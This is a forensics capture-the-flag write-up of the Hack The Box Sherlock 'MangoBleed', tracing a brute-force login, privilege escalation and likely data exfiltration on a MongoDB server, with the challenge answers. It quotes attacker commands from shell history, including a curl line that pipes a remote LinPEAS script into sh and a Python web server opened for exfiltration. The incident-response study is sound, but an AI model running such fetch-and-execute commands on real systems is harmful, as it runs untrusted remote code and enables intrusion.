HTB Sherlock - MangoBleed
Author: Alcidius
March 04, 2026
Scenario
You were contacted early this morning to handle a high‑priority incident involving a suspected compromised server. The host, mongodbsync, is a secondary MongoDB server. According to the administrator, it’s maintained once a month, and they recently became aware of a vulnerability referred to as MongoBleed. As a precaution, the administrator has provided you with root-level access to facilitate your investigation.
You have already collected a triage acquisition from the server using UAC. Perform a rapid triage analysis of the collected artifacts to determine whether the system has been compromised, identify any attacker activity (initial access, persistence, privilege escalation, lateral movement, or data access/exfiltration), and summarize your findings with an initial incident assessment and recommended next steps.
Summary: An unknown attacker likely exploited the MongoDB server, the task is to investigate the UAC triage artifacts to confirm the breach, trace the attacker’s actions (initial access, persistence, privilege escalation, lateral movement, and data exfiltration), and provide an incident assessment with next steps.
Challenge Info
| Field | Details |
|---|---|
| Category | DFIR |
| Difficulty | Very easy |
Investigation
Initial Analysis
The UAC artefact contains:
├── uac-mongodbsync-linux-triage
│ ├── bodyfile
│ ├── hash_executables
│ ├── live_response
│ ├── [root]
│ └── system
I started looking into the [root] directory. Specifically looking for the wtmp file in [root]/var/log/wtmp to investigate who might have successfully logged into the machine.
Successful login
From the wtmp file, it appears that at 2025-12-29 05:40:03 UTC, a successful login came from 65.0.76.43 on user mongoadmin. Delving deeper into [root]/var/log/mongodb/mongod.log it appears this IP is associated with a brute force attack that started at 2025-12-29 05:25:52.
Privilege escalation
Looking at the user’s .bash_history, the attacker performed a whoami followed by a download of LinPeas. This is a privilege escalation tool for Linux.
Extraction
After the execution of LinPeas, the attacker changed directories to /var/lib/mongodb. The attacker also installed zip and opened a python http.server indicating potential extraction of data might have occurred.
Questions & Answers
Q1: What is the CVE ID designated to the MongoDB vulnerability explained in the scenario?
Answer: CVE-2025-14847
Reasoning: MongoDB suffered from a critical flaw that allows unauthenticated remote attackers remote access to the system.
Q2: What is the version of MongoDB installed on the server that the CVE exploited?
Answer: 8.0.16
Reasoning: Running rg "buildInfo" ./uac-mongodbsync-linux-triage/\[root\]/var/log/mongodb/mongod.log within the logging tells the version is 8.0.16, this version appears to be vulnerable to CVE-2025-14847.
Q3: Analyze the MongoDB logs to identify the attacker’s remote IP address used to exploit the CVE.
Answer: 65.0.76.43
Reasoning: The WTMP file logged a successful login coming from IP 65.0.76.43. Cross referencing this IP with the logs in mongod.log, it appears this is an automated brute force attack due to the quick succession at which login attempts are following up on each other.
Q4: Based on the MongoDB logs, determine the exact date and time the attacker’s exploitation activity began (the earliest confirmed malicious event)
Answer: 2025-12-29 05:25:52
Reasoning: Both the mongod.log file, as well as the auth.log file, confirm that the brute force attack from 65.0.76.43 commenced at the time in UTC mentioned above.
Q5: Using the MongoDB logs, calculate the total number of malicious connections initiated by the attacker.
Answer: 75260
Reasoning: Running rg "65.0.76.43" ./uac-mongodbsync-linux-triage/[root]/var/log/mongodb/mongod.log | wc -l displays the amount of connections have been attempted by the attacker, leading to the number mentioned above.
Q6: The attacker gained remote access after a series of brute‑force attempts. The attack likely exposed sensitive information, which enabled them to gain remote access. Based on the logs, when did the attacker successfully gain interactive hands-on remote access?
Answer: 2025-12-29 05:40:03
Reasoning: The WTMP file logged the successful login at the time mentioned above in UTC. The login occurred on user mongoadmin.
Q7: Identify the exact command line the attacker used to execute an in‑memory script as part of their privilege‑escalation attempt.
Answer: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Reasoning: The .bash_history of user mongoadmin logged this command. LinPeas is a known penetration testing tool used to escalate privileges on Linux machines.
Q8: The attacker was interested in a specific directory and also opened a Python web server, likely for exfiltration purposes. Which directory was the target?
Answer: /var/lib/mongodb
Reasoning: The .bash_history of user mongoadmin logged a cd command to mongodb and opening a Python webserver. This indicates that potential extraction of data has taken place.
Key Takeaways
- rg or “ripgrep” is a very useful tool to extract text from several different log files.
- mongod.log files save logs in JSON. This can be prettified with
jq.
Logs Used
| Timestamp | source | Details | Remarks |
|---|---|---|---|
| 2025-12-2905:11:47.713Z | mongod.log | “version”: “8.0.16” | Version of the Mongo Instance |
| 2025-12-29T05:25:52Z | mongod.log | “remote”: “65.0.76.43:35340” | Start of the brute force attack |
| 2025-12-29 05:40:03Z | auth.log / wtmp | systemd-logind[678]: New session 10 of user mongoadmin. | The attacker logged into the machine |
| UNKNOWN | .bash_history | curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | Downloads LinPeas for privilege escalation |
| UNKNOWN | .bash_history | python3 -m http.server 6969 | Provides the possibility of extraction of data |